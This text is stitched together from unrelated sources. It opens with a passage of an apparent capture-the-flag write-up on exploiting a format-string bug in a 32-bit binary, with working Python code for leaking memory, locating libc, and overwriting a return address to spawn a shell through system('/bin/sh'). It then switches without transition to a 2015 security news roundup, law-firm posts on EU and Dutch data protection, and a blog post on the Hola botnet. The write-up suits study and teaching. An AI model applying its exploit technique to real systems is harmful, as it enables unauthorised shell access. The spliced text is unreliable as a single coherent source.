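For example, writing the (hypothetical) byte value 0x90 works out like this:

# prefix: "51.492137,-0.192878 " + packed address = 24 chars printed
# pad:    "%" + str(0x90 + 256 - 24) + "x"        = 376 more chars
# total:  24 + 376 = 400 = 0x190, and %20$n stores 400, whose low byte is 0x90

One subtlety: %n stores a full 4-byte count, so each write also clobbers the three bytes above its target - but because write_byte() is called on ascending addresses, each later write repairs what the previous one spilled.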

leak()

Meanwhile, my teammate wrote this function that, while ugly, can leak arbitrary memory addresses using "%s":

import re
import struct
import sys

def leak(address):
    print >> sys.stderr, "*** Leak 0x%04x" % address
    # The first assignment is leftover from an earlier attempt; the second
    # (using %24$s) is the one that actually gets sent.
    s = "51.492137,-0.192878 " + struct.pack("<I", address) + " >>>%20$s<<<"
    s = "    51.492137,-0.192878 >>>%24$s<<< " + struct.pack("<IIII", address, address, address, address)
    #print >> sys.stderr, "s", repr(s)
    print s
    sys.stdout.flush()
    sys.stdin.readline() # Echoed coordinates.
    resp = sys.stdin.readline()
    #print >> sys.stderr, "resp", repr(resp)
    m = re.search(r'>>>(.*)<<<', resp, flags=re.DOTALL)
    while m is None:
        extra = sys.stdin.readline()
        assert extra, repr(extra)
        resp += extra
        print >> sys.stderr, "read again", repr(resp)
        m = re.search(r'>>>(.*)<<<', resp, flags=re.DOTALL)
    assert m is not None, repr(resp)
    resp = m.group(1)
    if resp == "":
        resp = "\0" # an empty match means the byte at address was NUL
    return resp

Then, exactly like the last blog, we use the vulnerability to leak a return address and frame pointer, then overwrite the return address with a chosen address, and thus obtain EIP control.

Getting libc's base address

Next, we needed an address to return to. This was a little tricky, since I wasn't able to steal a copy of their libc.so file (this was the only 32-bit level our team worked on) - that means I could easily exploit myself, because I have my own libc handy, but I couldn't exploit them. pwntools has a module that can find base addresses given a memory leak, but it was too slow and the connection would time out before it finished (more on that later).

So, I used the format-string vulnerability and a bit of experience to get the base address of libc. We use %s in the format string to leak a resolved function pointer from the GOT (the table the PLT jumps through), which gives us the address of something inside libc - I chose printf() because it's the first one I could think of. The GOT entry sits at a static offset in the wwtw binary (we already know the return address, since we leaked it off the stack, and that can be used to calculate where the GOT is).

Once I had that address, I worked my way backwards, reading the first bytes of each page (multiple of 0x1000) until I found an ELF header. Here's the code:

# leak() is the function shown above; hexify() is a hex-dump helper defined
# elsewhere in the script.
bf = printf_addr - 0xc280
while True:
    print >> sys.stderr, "Checking", hex(bf), " (printf - ", hex(printf_addr - bf), ")..."
    data = leak(bf)
    print >> sys.stderr, hexify(data)
    if data[0:4] == "\x7FELF":
        break

    bf -= 0x1000

I now had the relative offset of printf(), which means given the address of printf(), I can find the base address deterministically.
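
After that one-time scan, the lookup collapses to simple arithmetic (the offset value here is illustrative, not the real one):

PRINTF_OFFSET = 0x4d280  # printf_addr - bf, whatever the scan reported
libc_base = printf_addr - PRINTF_OFFSET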

Getting system()'s address

Once I had the base address, I wanted to find the address of system(). I don't normally like using stuff I didn't write, because it's really hard to troubleshoot when there's a problem, but I couldn't find an easy way to do this by bruteforce, so I tried using pwntools ('leak' refers to the function shown earlier):

d = dynelf.DynELF(leak, libc_base_REAL)
system_addr = d.lookup("system", 'libc')

Once again, this was too slow and kept timing out. I looked at some options, like stealing the libc binary from memory by returning into the write() libc function (like I did in ropasaurusrex) or trying to make pwntools start where it left off after being disconnected, but none of it would work.

(in retrospect, I probably could have silently re-connected/re-solved the first half of the level in the leak() function and just continued where I left off, but that didn't occur to me till now, like two weeks later)

After fighting for far too long, I had a realization: maybe my home Internet connection just sucks. I uploaded the script to my server and it found the address on the first try (and solved the game portion like 10x faster).

Getting "/bin/sh"'s address

Although I ended up with the address of system(), getting the address of "/bin/sh" from libc might be a bit tricky, so instead I simply put the string in my own input buffer - the same buffer that contains the format string - and calculated the offset from the leaked ebp value to that address. Since it was on the stack, it was always at a fixed offset from the saved ebp, which we had access to.

I could easily have leaked libc until I found the offset to the string, but that's completely unnecessary.
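
The arithmetic looks something like this (BUFFER_OFFSET is an illustrative name - the constant comes from eyeballing the stack in gdb once):

buffer_addr = leaked_ebp - BUFFER_OFFSET  # input buffer sits at a fixed offset below the saved ebp
sh_addr = buffer_addr + 200 + FUDGE       # where "/bin/sh" lands within our input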

Building the ROP chain

In the end, I had the address of system() and the address of "/bin/sh" in my buffer. I used them to construct a really simple ROP chain, similar to the one used in r0pbaby (the difference is that, since we're on 32-bit for this level, we can pass the address of "/bin/sh" on the stack and don't have to worry about finding a gadget):

write_byte(return_ptr+0, (system_addr >> 0) & 0x0FF)
write_byte(return_ptr+1, (system_addr >> 8) & 0x0FF)
write_byte(return_ptr+2, (system_addr >> 16) & 0x0FF)
write_byte(return_ptr+3, (system_addr >> 24) & 0x0FF)

write_byte(return_ptr+4, 0x5e)
write_byte(return_ptr+5, 0x5e)
write_byte(return_ptr+6, 0x5e)
write_byte(return_ptr+7, 0x5e)

sh_addr = buffer_addr + 200 + FUDGE
write_byte(return_ptr+8,  (sh_addr >> 0) & 0x0FF)
write_byte(return_ptr+9,  (sh_addr >> 8) & 0x0FF)
write_byte(return_ptr+10, (sh_addr >> 16) & 0x0FF)
write_byte(return_ptr+11, (sh_addr >> 24) & 0x0FF)

Basically, I wrote the 4-byte address of system() over the actual return address in four separate printf() calls. Then I wrote 4 useless bytes (they don't really matter - they're system()'s return address so I made them something distinct so I can recognize the crash after system() returns). Then I wrote the address of "/bin/sh" over the next 4 bytes (the first parameter to system()).
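
Laid out, it's the classic 32-bit return-to-libc frame:

# return_ptr+0..3   address of system()  <- overwritten return address
# return_ptr+4..7   0x5e5e5e5e           <- fake return address for system()
# return_ptr+8..11  sh_addr              <- system()'s first argument: &"/bin/sh"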

Once that was done, I sent "good" coordinates - 100000,100000 - which caused the function to return. Since the return address had been overwritten, it returned to system("/bin/sh") and it was game over.

Conclusion

I really liked this level because it had multiple parts.

First, we had to solve a game by making some simple AI.

Second, we had to find the "key" by either reverse engineering or debugging.

Third, we had to bypass the timestamp check by exploiting an off-by-one error.

And finally, we had to use a format string vulnerability to get EIP control and win the level.

One interesting dynamic of this level was its anti-debugging features. One was the alarm()-driven timer that the off-by-one exploit depended on, since people frequently remove calls to alarm(); the other was using the first few bytes of a function as key material to interfere with software breakpoints.

Community news and analysis: May 2015

Featured news

  • How effective are the security questions—and answers—used to protect sensitive accounts and information? Not very, according to new Google research. Read about how easy it is for hackers and bots to guess answers to common questions, and what users can do about it.
  • Google also published research last month on the ad injection economy (key findings here, full report here).
  • Mozilla sent a communication to CAs with root certificates included in Mozilla’s program; Mozilla, acting in the best interest of users, asked CAs to respond to five action items. They’ve stated they intend to publish the responses this month.
  • WordPress users: The Automattic team released WordPress 4.2.2, featuring critical security fixes, the first week of May. Please make sure you’re updated!
  • DomainTools put together their first report profiling malicious domains by delving into domain registration attributes and overlaying this with data on malicious activity. Their summary links to the full report here.

Malware news + analysis

  • ESET: Whitepaper on CPL malware in Brazil
  • Sophos: “PolloCrypt” ransomware sounds as ridiculous as its mascots look—but it’s a real thing targeting Aussie users. Also from Sophos: Can Rombertik malware really destroy your computer? Nope.
  • Fortinet analyses of Rombertik malware and Tinba botnet malware
  • Sucuri: Hacked websites redirect to...Bitcoin?

Other security news

  • SiteLock: Who else is reading your email? A guide to PGP encryption
  • Fortinet: Should new WHO disease-naming guidelines also be applied to malware?

Article 29 Working Party Issues Updated Guidance on BCRs for Processors

On May 22, 2015, the Article 29 Working Party published an update to its explanatory document regarding the use of Binding Corporate Rules (“BCRs”) by data processors (“WP204”). The original explanatory document was published on April 19, 2013 and identified two scenarios in which a non-EU processor, processing personal data received under BCRs, should notify the controller and the relevant data protection authorities (“DPAs”) in the event of a legally binding request for the personal data.

In summary, the scenarios are:

  • Anticipation of non-EU disclosure requirements – If the non-EU processor believes that local laws (whether current or anticipated) may require it to disclose personal data to non-EU regulators or government agencies (or might otherwise result in the non-EU processor being unable to comply with its obligations under the BCRs), it should notify three parties of the local law requirements:
    • the controller;
    • the processor group’s EU headquarters; and
    • the DPA in the controller’s EU Member State.
  • Requests from non-EU regulators or government agencies – If a non-EU processor receives a legally binding request for personal data from a non-EU regulator or government agency, the non-EU processor should notify a slightly different set of parties. In that event, the non-EU processor should notify:
    • the controller;
    • the DPA in the controller’s EU Member State; and
    • the lead DPA that approved the processor group’s BCRs.

The Working Party’s updated version of WP204 does not amend the requirements set out above. Rather, the updated version provides additional guidance, including:

  • The BCRs should require the non-EU processor to assess each request for personal data on a case-by-case basis and put each request “on hold” for a reasonable period of time, in order to notify the competent DPAs. The notification to the DPAs must explain the legal grounds on which disclosure is requested.
  • The competent DPAs must endeavor to respond to notifications from the non-EU processor within a reasonable timeframe, and may decide whether to suspend or prohibit further transfers of personal data to the non-EU processor under the BCRs. Alternatively, those DPAs may decide to authorize disclosures of the type made by the non-EU processor.
  • If the laws under which the relevant request is made prohibit the non-EU processor from notifying the parties listed above, the non-EU processor must use “best efforts” to waive that prohibition, and must be able to demonstrate that it did so.
  • Where the non-EU processor cannot notify the competent DPAs of a disclosure, it must provide the DPAs with general information (such as the number of requests received in a year, the types of data requested, and the types of requesters, where possible).
  • The Working Party states that disclosures of personal data by a non-EU processor to a local public authority cannot be “massive, disproportionate and indiscriminate in a manner that…would go beyond what is necessary in a democratic society.” This is consistent with existing EU data protection concepts, but non-EU processors may find these standards difficult to satisfy under the laws of their respective jurisdictions.
  • The Working Party recommends that “international or intergovernmental agreements should be put in place to provide adequate data protection guarantees to EU data.”

Although the Working Party’s guidance provides helpful clarification, a number of questions remain unresolved. In particular, there is a risk that non-EU processors will send frequent and overly broad notifications to DPAs (even where a possible future disclosure requirement is entirely hypothetical) in order to comply with the Working Party’s guidance. It is unclear how DPAs will respond if they are inundated with notifications concerning hypothetical disclosure obligations.

BCRs for processors remain an evolving area of EU data protection law, and it is likely that we will see further guidance on these issues from DPAs and the Working Party as increasing numbers of processors begin to use BCRs.

Article 29 Working Party and APEC Agree on Work Plan to Simplify Dual Certification under APEC CBPRs and EU BCRs

On May 29, 2015, Article 29 Working Party Chairwoman Isabelle Falque-Pierrotin sent a letter to APEC Data Privacy Subgroup (“DPS”) Chair Danièle Chatelois, expressing the Working Party’s continued support for the collaboration between the two groups.

In March 2014, the two groups released a joint “Referential” that maps the respective requirements of the APEC Cross-Border Privacy Rules (“CBPR”) system and EU Binding Corporate Rules (“BCRs”). In her letter, Falque-Pierrotin characterized their collaboration to date as “fruitful” and expressed the Working Party’s continued support for further collaboration “to develop practical tools that will help organizations implement both requirements from the CBPR and BCR systems.”

Referring to the joint Working Party-DPS action plan adopted at the Working Party’s 100th plenary meeting on April 14-15 in Brussels (view the press release from April 15), the letter sets forth the following agreed action items for the BCRs-CBPRs working team:

In the short term:

  • Develop a common CBPRs/BCRs application form that organizations seeking dual certification can submit to European data protection authorities and APEC Accountability Agents.
  • Develop compliance mapping tools with respect to the CBPRs and BCRs that must be submitted along with the application.

In the long term:

  • Develop a mapping document comparing the respective requirements of the BCRs for processors and the APEC Privacy Recognition for Processors.

The three action items were based on recommendations developed during the BCR-DPS working team meeting in the margins of the last round of APEC privacy meetings earlier this year in Subic Bay, Philippines, and a subsequent consultation with businesses experienced in seeking dual certification under both systems.

NIST Publishes Draft Report on Privacy Risk Management for Federal Information Systems

On June 2, 2015, the National Institute of Standards and Technology (“NIST”) issued a press release on its recently published draft report, entitled Privacy Risk Management Framework for Federal Information Systems (the “Report”). The Report describes a privacy risk management framework (“PRMF”) for federal information systems designed to promote “a greater understanding of privacy impacts and the capability to address them in federal information systems through risk management.” The draft PRMF includes a Privacy Risk Assessment Methodology (“PRAM”) consisting of several worksheets for assessing the privacy impact of data actions.

Key elements and objectives of the PRMF include:

  • A common vocabulary concerning privacy risks and the implementation of privacy principles.
  • A means for bridging the gap between high-level principles and practical implementation of privacy protections.
  • Three privacy engineering objectives – predictability, manageability and disassociability – that enable effective privacy risk management systems.
  • A methodology that enables agencies to identify and quantify privacy risks.
  • A methodology that “yield[s] repeatable and measurable” results and allows agencies to prioritize and allocate resources to achieve their missions while also minimizing any adverse impacts on individuals and themselves.

NIST has requested that comments on the Report be submitted by July 13. The comments form can be found on the NIST website and can be submitted to privacyeng@nist.gov. NIST has indicated that its future work in the area of privacy risk management will focus on the controls to mitigate the risks identified in the PRMF.

Germany Adopts a Draft Telecom Data Retention Law that Includes a Localization Requirement

On May 28, 2015, the German government adopted a draft law that would require telecommunications and Internet service providers to retain Internet and telephone usage data. The initiative comes more than a year after the European Court of Justice declared the EU Data Retention Directive invalid; the Directive had previously been implemented in German law. That implementing law had itself been declared unconstitutional by the German Federal Constitutional Court five years ago.

Retention Periods

Under the draft law, telecommunications and Internet service providers would have to retain various Internet and telephone usage data, including phone numbers, times called, IP addresses, and the international identifiers of mobile users (if applicable), for both the calling and called parties, for a period of 10 weeks. Furthermore, user location data in the context of mobile phone services would have to be retained for a period of four weeks. The draft law also requires the data to be deleted without undue delay after the expiration of the relevant retention period, and in any event, within one week following the expiration of the retention period.

Security and Localization Requirements

Telecommunications and Internet service providers also would be required to ensure that (1) data is stored in accordance with the highest possible levels of security, (2) data is stored within Germany, and (3) measures are in place to protect data from unauthorized inspection and use.

Administrative Offense and Fines

Non-compliance with the data retention requirements would constitute an administrative offense that would be punishable by a maximum fine of 500,000 EUR.

The draft law must be approved by Parliament before becoming law. It has generated significant criticism from leading telecommunications industry associations.

EU General Data Protection Regulation: Timetable for Trilogue Discussions

On June 1, 2015, the Group of the European People’s Party in the European Parliament released an updated timetable for agreeing on the proposed EU General Data Protection Regulation (the “Regulation”). The European Commission, European Parliament and the Council of the European Union will soon enter multilateral negotiations, known as the “trilogue,” to agree on the final text of the proposed Regulation.

The trilogue will commence once the Council of the European Union, acting through the Justice and Home Affairs Council (the “Council”), has agreed on its common position, which is expected to be finalized imminently, and formally adopted by the Council at its next meeting on June 15, 2015, in Luxembourg. The first trilogue negotiations are expected to take place shortly after June 24, 2015. The European Parliament also will publish a general roadmap for further trilogue meetings later in 2015, but exact dates have not yet been finalized and are subject to agreement with the European Commission and Council of Ministers.

The key dates are as follows:

  • June 15, 2015 – Justice and Home Affairs Ministers Council meeting in Luxembourg, where it is assumed a general approach to the Regulation will be adopted.
  • June 24, 2015 – First trilogue meeting to be held in Brussels (subject to agreement with the European Commission and the Council) to agree on the overall roadmap for trilogue negotiations.
  • July 14, 2015 – Second trilogue meeting to discuss territorial scope and international transfers.
  • September 2015 – Further trilogue meetings to debate data protection principles, the rights of data subjects and the obligations of controllers and processors.
  • October 2015 – Trilogue discussions will focus on Data Protection Authorities, cooperation and consistency, and remedies, liability and sanctions.
  • November 2015 – Further trilogue meetings to deliberate (1) the objectives and material scope of the Regulation, (2) flexibility for the public sector and (3) specific data processing regimes.
  • December 2015 – The last trilogue meetings of the year will focus on delegated and implementing acts, final provisions and any other remaining issues.

In addition, the incoming Luxembourg Council Presidency is aiming to agree on a general approach to the Police and Criminal Justice Data Protection Directive, the second element of the EU data protection reform package, in October or November of this year. A trilogue would start immediately afterward and run in parallel with the trilogue on the Regulation.

Hunton’s Privacy Practice Receives Global Tier 1 Ranking by Chambers

Hunton & Williams LLP announces the firm’s Global Privacy and Cybersecurity practice was again ranked in Tier 1 by Chambers & Partners in their 2015 Global and USA guides. Over the last eight years, the firm has been recognized by Chambers Global, Chambers UK and Chambers USA as a Tier 1 firm for privacy and data protection. As noted by Chambers USA, the practice lawyers “have established themselves as real leaders in this area.”

Lisa Sotto, head of the firm’s global privacy and cybersecurity practice and managing partner of the New York office, received the top honor of “Star” individual for privacy and data security from Chambers USA, and she was recently named to The National Law Journal’s Outstanding Women Lawyers list, the latest recognition of Sotto’s career and reputation as one of the world’s leading practitioners in privacy and cybersecurity law. The head of the firm’s UK privacy and cybersecurity practice, Bridget Treacy, and senior attorney Rosemary Jay also received the honor of “Star” individuals for data protection from Chambers UK. Brussels office managing partner Wim Nauwelaerts is recognized as a leading privacy practitioner by Chambers Global, Chambers Europe, The Legal 500 (Belgium) and Global Law Experts.

The practice focuses on all aspects of privacy, cybersecurity and information governance issues for multinational companies across a broad range of industry sectors. Computerworld magazine recognized Hunton & Williams as the best global privacy advisor for each of its four surveys, stating that “Hunton & Williams stood head and shoulders above the rest.” Hunton & Williams also was selected for one Fortune 100 client’s 2013 Law Firm Award for its privacy work, noting that the privacy team’s “laser focus on the issues resulted in a flawless execution.”

The firm’s privacy practice has extensive experience organizing, managing and coordinating compliance projects with both national and international dimensions. Together with the firm’s Centre for Information Policy Leadership, lawyers in the practice develop innovative, pragmatic approaches to privacy and data security policy that take into account business imperatives and address the concerns of individuals regarding the protection of their information.

New Dutch Law Introduces General Data Breach Notification Obligation and Higher Sanctions

On May 26, 2015, the Upper House of the Dutch Parliament passed a bill that introduces a general obligation for data controllers to notify the Dutch Data Protection Authority (“DPA”) of data security breaches and provides increased sanctions for violations of the Dutch Data Protection Act. A Dutch Royal Decree still needs to be adopted to set the new law’s date of entry into force. According to the Dutch DPA, the new law is likely to come into force on January 1, 2016.

Currently, Dutch law includes data breach notification obligations for specific sectors in the Netherlands (e.g., the financial and healthcare sectors) or particular types of organizations (e.g., telecommunications and Internet service providers). The new law will extend that obligation to all data controllers subject to the Dutch Data Protection Act. In this respect, the new Dutch law anticipates the proposed EU General Data Protection Regulation, which will introduce such an obligation across the EU but not before 2017-2018.

Under the new Dutch law, data controllers will be required to immediately notify the Dutch DPA of any data security breaches that have, or are likely to have, serious adverse consequences for the protection of personal data. The DPA will likely issue practical guidance at a later stage to clarify the circumstances under which notification to the DPA is required. In addition, as a result of the new law, telecommunications and Internet service providers will be required to report data security breaches to the Dutch DPA (and no longer to the Dutch Authority for Consumers & Markets, whose role in this area will be taken over by the Dutch DPA). Under the new law, notifications to the DPA should include at least the following information:

  • the nature of the breach;
  • the entities or bodies that can provide further information on the breach;
  • the expected consequences of the breach for the data processing;
  • the recommended measures to mitigate the adverse consequences of the breach; and
  • the measures taken to deal with the breach.

In addition to notifying the DPA, data controllers will be required to notify affected individuals if there is a reason to believe that the breach could lead to adverse consequences for them, unless the compromised data is encrypted or otherwise unintelligible to third parties. Data controllers also will have to maintain an internal data breach register recording all data security breaches they experience that might affect individuals.

Failure to provide notification of data security breaches will be subject to a fine of up to € 810,000 or 10% of the organization’s annual net turnover. The new law also will empower the DPA to impose higher fines for other violations of the Dutch Data Protection Act. The amounts of administrative fines will be increased to:

  • € 20,250 for violations already subject to a fine (e.g., the failure of non-EU data controllers to appoint a local representative when using means of data processing in the Netherlands, or failure to comply with cross-border data transfer restrictions), and
  • a maximum of € 810,000 or 10 % of the organization’s annual net turnover for other violations of the Dutch Data Protection Act.

It’s No Fun Being Right All the Time

Last week, I finally got around to writing about HideMyAss, and doing a spot of speculation about how other proxy anonymizers earn their coin. Almost immediately after I hit "publish," I spotted this article pop up on ZDNet. Apparently/allegedly, Hola supplement their income by turning your machine into a part-time member of a botnet.
Normally, I really enjoy being proved right - ask my long-suffering colleagues. In this case, though, I'd rather the news weren't quite so worrying. A bit of advertising, click hijacking and so forth is liveable with. Malware? You can get rid of it... but a botnet client means you might be part of something illegal, and you'd never know the difference.